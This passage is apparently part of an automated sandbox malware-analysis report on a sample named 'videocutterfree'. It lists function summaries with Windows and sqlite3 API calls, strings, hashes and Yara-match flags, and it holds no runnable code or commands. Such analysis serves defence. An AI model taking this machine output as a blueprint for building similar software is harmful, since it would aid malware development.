                                                                              • Opcode ID: b1a092245604d4d592313b0a3ffe50a8af5b2c4a17abc9c0ae205369c26e4128
                                                                              • Instruction ID: 664e626ac86d25d6a7ba32a41dfb7192c56391b40f087c31cd1d35305280fa89
                                                                              • Opcode Fuzzy Hash: b1a092245604d4d592313b0a3ffe50a8af5b2c4a17abc9c0ae205369c26e4128
                                                                              • Instruction Fuzzy Hash: 1B116072D14218EBCF11AFA9DC05AAEBFB9FF58310F00412AF815E3221D7795A51EB90
                                                                              APIs
                                                                                • Part of subcall function 00999F14: __EH_prolog.LIBCMT ref: 00999F19
                                                                              • __CxxThrowException@8.LIBCMT ref: 0099AADE
                                                                                • Part of subcall function 009A330A: RaiseException.KERNEL32(?,?,0099E90E,?,?,?,?,?,?,?,0099E90E,?,009BFCF8,?), ref: 009A335F
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,009C0B14,?,00000001), ref: 0099AAF4
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 0099AB07
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,009C0B14,?,00000001), ref: 0099AB17
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0099AB25
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2725315915-0
                                                                              • Opcode ID: f561bd3a2d548f57c9b32fea9d19fb84e0b284ca3eeb1ce8b42956f06ba72afa
                                                                              • Instruction ID: 556f78756d59d8bba1b61e5c2a28d9b1dbb24e49bebc3f7ea30bc4891506545b
                                                                              • Opcode Fuzzy Hash: f561bd3a2d548f57c9b32fea9d19fb84e0b284ca3eeb1ce8b42956f06ba72afa
                                                                              • Instruction Fuzzy Hash: 5601A4B2618308AFDF10EFA9DD89F4B77ADEB04369B008514F626D7190DB64FC449BA0
                                                                              APIs
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00992432
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00992445
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00992454
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992469
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00992470
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 747265849-0
                                                                              • Opcode ID: a7c16eab4ff1bf08fe4e14ee58c3275d5fd3ee22ccf4147ca9a3d08c894205ff
                                                                              • Instruction ID: fb43c4d5645d445a58704b2b7a0f2533aff049f4428f6533d728acd97bdd6dae
                                                                              • Opcode Fuzzy Hash: a7c16eab4ff1bf08fe4e14ee58c3275d5fd3ee22ccf4147ca9a3d08c894205ff
                                                                              • Instruction Fuzzy Hash: 9FF09072210200BBDB00ABA6EE4DFD6772CFB45721F804111F701D2090D765B920DBA0
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 00991ED2
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 00991EEA
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00991EF9
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00991F0E
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00991F15
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 830998967-0
                                                                              • Opcode ID: c6d392f0b8d1f101f02837f4edd137afc0bb2bfd4a1224ce151d68b338369708
                                                                              • Instruction ID: e6d8a57eaf443a0a98016008d9fbbf13234c00926fcadb882e94bb7c8b73124c
                                                                              • Opcode Fuzzy Hash: c6d392f0b8d1f101f02837f4edd137afc0bb2bfd4a1224ce151d68b338369708
                                                                              • Instruction Fuzzy Hash: CEF01772214605BBDB00AFA6EE89FD6BB6CFF55321F000116F60282490DB69B9659BA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log
                                                                              • String ID: ($string or blob too big$|
                                                                              • API String ID: 632333372-2398534278
                                                                              • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                              • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                              • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                              • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID: invalid string position$string too long
                                                                              • API String ID: 4104443479-4289949731
                                                                              • Opcode ID: 29057f97ec2c7988a77ef800aafc625c27b9e7d57090b6adf0aeeb218c2ef29d
                                                                              • Instruction ID: 54dc3a6cc2e3369abb352f57c0279d7f559d0ce578da8daedfac16149d2d84b6
                                                                              • Opcode Fuzzy Hash: 29057f97ec2c7988a77ef800aafc625c27b9e7d57090b6adf0aeeb218c2ef29d
                                                                              • Instruction Fuzzy Hash: D441A271314705ABDF34DEADD884A5AFBA9EB81760B14092DF856C7281CF70E804CBA2
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 009930C3
                                                                              • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 00993102
                                                                              • _memcmp.LIBCMT ref: 00993141
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastString_memcmp
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 1618111833-2422070025
                                                                              • Opcode ID: 29815f8cbd651e297b976968ef4de82b6a239adfbdccf0235d57868cbcfd71b2
                                                                              • Instruction ID: ce5b23e031b87a999a5f9acd46017a566b05932126cd38d813a8a4e43af7e55d
                                                                              • Opcode Fuzzy Hash: 29815f8cbd651e297b976968ef4de82b6a239adfbdccf0235d57868cbcfd71b2
                                                                              • Instruction Fuzzy Hash: 7731C4719043049FDF309F78C88176EB7B9EF85320F10866AE8659B291D772AE45CB90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Protect$Query
                                                                              • String ID: @
                                                                              • API String ID: 3618607426-2766056989
                                                                              • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                              • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                              • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                              • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                              APIs
                                                                              • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                              • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                              • sqlite3_free.SQLITE3 ref: 609283B6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                              • String ID: d
                                                                              • API String ID: 211589378-2564639436
                                                                              • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                              • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                              • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                              • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00991F5B
                                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 00991FC5
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00991FD2
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                              • String ID: iocp
                                                                              • API String ID: 998023749-976528080
                                                                              • Opcode ID: bd864fdd30d8bba98702103bd39158443604492c85680fc0c2e08fede3af5d7d
                                                                              • Instruction ID: 1e8f7edc9c0085c6951e999df182b120cfd4cf00817f776825fbe308f1341080
                                                                              • Opcode Fuzzy Hash: bd864fdd30d8bba98702103bd39158443604492c85680fc0c2e08fede3af5d7d
                                                                              • Instruction Fuzzy Hash: F621B9B18017459FC720DF6AD50455AFBF8FFA5720B108A1FE4A6D3AA0D7B0A544CF91
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 009A2914
                                                                                • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
                                                                                • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
                                                                                • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
                                                                              • std::exception::exception.LIBCMT ref: 009A2932
                                                                              • __CxxThrowException@8.LIBCMT ref: 009A2947
                                                                                • Part of subcall function 009A330A: RaiseException.KERNEL32(?,?,0099E90E,?,?,?,?,?,?,?,0099E90E,?,009BFCF8,?), ref: 009A335F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3074076210-2104205924
                                                                              • Opcode ID: 60fe27a2dbf6ba4f0add8f311e38a043cb2bb404bac347d08f3981f6c7f68160
                                                                              • Instruction ID: 08f841aa94585b77bc60b0d72d855c4681be5458d63a43b94788ed4a5b08383d
                                                                              • Opcode Fuzzy Hash: 60fe27a2dbf6ba4f0add8f311e38a043cb2bb404bac347d08f3981f6c7f68160
                                                                              • Instruction Fuzzy Hash: 8AE0A03480420DAACF14FBA4DE06AEF7BACAB82310F000555EC10A1192DB709A4086D0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009937B6
                                                                              • __localtime64.LIBCMT ref: 009937C1
                                                                                • Part of subcall function 009A13B0: __gmtime64_s.LIBCMT ref: 009A13C3
                                                                              • std::exception::exception.LIBCMT ref: 009937D9
                                                                                • Part of subcall function 009A1283: std::exception::_Copy_str.LIBCMT ref: 009A129C
                                                                                • Part of subcall function 009992D7: __EH_prolog.LIBCMT ref: 009992DC
                                                                                • Part of subcall function 009992D7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009992EB
                                                                                • Part of subcall function 009992D7: __CxxThrowException@8.LIBCMT ref: 0099930A
                                                                              Strings
                                                                              • could not convert calendar time to UTC time, xrefs: 009937CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                              • String ID: could not convert calendar time to UTC time
                                                                              • API String ID: 1963798777-2088861013
                                                                              • Opcode ID: 96be3c0a1289083471d81f73b910b0d33d4b31d9c36226dae616905709e0e84e
                                                                              • Instruction ID: e0f037cbecc79ff8ddc532c8ac3fdf587600c2a6d93f14d1f133e7ebaba5d453
                                                                              • Opcode Fuzzy Hash: 96be3c0a1289083471d81f73b910b0d33d4b31d9c36226dae616905709e0e84e
                                                                              • Instruction Fuzzy Hash: 79E06DB5C0420DABCF10EFD8D9057FEB7BCEB50314F40855AE820A2681DB7486058B80
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                              • API String ID: 1646373207-2713375476
                                                                              • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                              • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                              • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                              • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                              APIs
                                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403C26), ref: 00404829
                                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403C26), ref: 0040484D
                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403C26), ref: 00404867
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403C26), ref: 00404928
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403C26), ref: 0040493F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 714016831-0
                                                                              • Opcode ID: aa1c79425a6e2cd61392854a67e995b6516d68530b710bf6c895b0b32f8b34e0
                                                                              • Instruction ID: a24b006555a53889427afbffb51939042c46b62d0abea148fbc6107f6e5d4a7c
                                                                              • Opcode Fuzzy Hash: aa1c79425a6e2cd61392854a67e995b6516d68530b710bf6c895b0b32f8b34e0
                                                                              • Instruction Fuzzy Hash: 3731D2B5A407029FD3319F24DD45B22B6A4EB84764F11853EF265B76D0E7B8A800974D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdjustPointer_memmove
                                                                              • String ID:
                                                                              • API String ID: 1721217611-0
                                                                              • Opcode ID: 20f7653f3db528fb0e33989bdf75cf956be07dcfdf8ca928fe35ec03fbe2128a
                                                                              • Instruction ID: 1247b4e7d1fe124ba7b61669fd22008c4311615fe0e5873ef13e54ea95d747f9
                                                                              • Opcode Fuzzy Hash: 20f7653f3db528fb0e33989bdf75cf956be07dcfdf8ca928fe35ec03fbe2128a
                                                                              • Instruction Fuzzy Hash: 524161356053079EEF245E24D856BBB77E8AF93760F29401EE8458A1E3EF71E880D690
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00994149), ref: 009A016F
                                                                                • Part of subcall function 00993FDC: __EH_prolog.LIBCMT ref: 00993FE1
                                                                                • Part of subcall function 00993FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00993FF3
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009A0164
                                                                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,00994149), ref: 009A01B0
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00994149), ref: 009A0281
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$Event$CreateH_prolog
                                                                              • String ID:
                                                                              • API String ID: 2825413587-0
                                                                              • Opcode ID: 1f357223770da07b2515a865366f3707160b351e7c5aa52309f41d98d3b2a722
                                                                              • Instruction ID: 42bcc55b908996d3fa1a3d62a93e0c501d704239a087fd42f0571ff94c61c181
                                                                              • Opcode Fuzzy Hash: 1f357223770da07b2515a865366f3707160b351e7c5aa52309f41d98d3b2a722
                                                                              • Instruction Fuzzy Hash: 5D51AE716043458BDB21DF28C888B9AB7E8BF8A328F194619FC6997291D735EC05CBD1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: c6e751584019fe7e8b02fdb2d017c5892803be91544b6d950ba89984b09a2191
                                                                              • Instruction ID: 23431df6680ab4b225c81fecc65fbb3dfd5fbfdddbbeda8bad311db777a25596
                                                                              • Opcode Fuzzy Hash: c6e751584019fe7e8b02fdb2d017c5892803be91544b6d950ba89984b09a2191
                                                                              • Instruction Fuzzy Hash: 46418371A057069BDF1C8FADC8906AE77B9EF86360B24853EF855C7240EA70DD419BD0
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009AECFB
                                                                              • __isleadbyte_l.LIBCMT ref: 009AED29
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 009AED57
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 009AED8D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 2690cc833af29d1c05921d49545d687a974c34e42ffeff93195e6a7896a19b3c
                                                                              • Instruction ID: c01ff5e66177998c6cbc440f8cdcbb26c0431b83dcec892b563352d824d13d29
                                                                              • Opcode Fuzzy Hash: 2690cc833af29d1c05921d49545d687a974c34e42ffeff93195e6a7896a19b3c
                                                                              • Instruction Fuzzy Hash: 45318D31604296AFDB219E75CC44BBA7BB9FF82320F154529F8648B1E1E730E990DBD0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                              • String ID:
                                                                              • API String ID: 1648232842-0
                                                                              • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                              • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                              • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                              • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                              APIs
                                                                              • sqlite3_step.SQLITE3 ref: 609614AB
                                                                              • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                              • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                              • String ID:
                                                                              • API String ID: 3429445273-0
                                                                              • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                              • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                              • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                              • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                              APIs
                                                                              • htons.WS2_32(?), ref: 00993DA2
                                                                                • Part of subcall function 00993BD3: __EH_prolog.LIBCMT ref: 00993BD8
                                                                                • Part of subcall function 00993BD3: std::bad_exception::bad_exception.LIBCMT ref: 00993BED
                                                                              • htonl.WS2_32(00000000), ref: 00993DB9
                                                                              • htonl.WS2_32(00000000), ref: 00993DC0
                                                                              • htons.WS2_32(?), ref: 00993DD4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 3882411702-0
                                                                              • Opcode ID: 72798e6e07424c6cfd52fc5155d1368cf78c711f8c1a415bfdd7b605eb1dd1fc
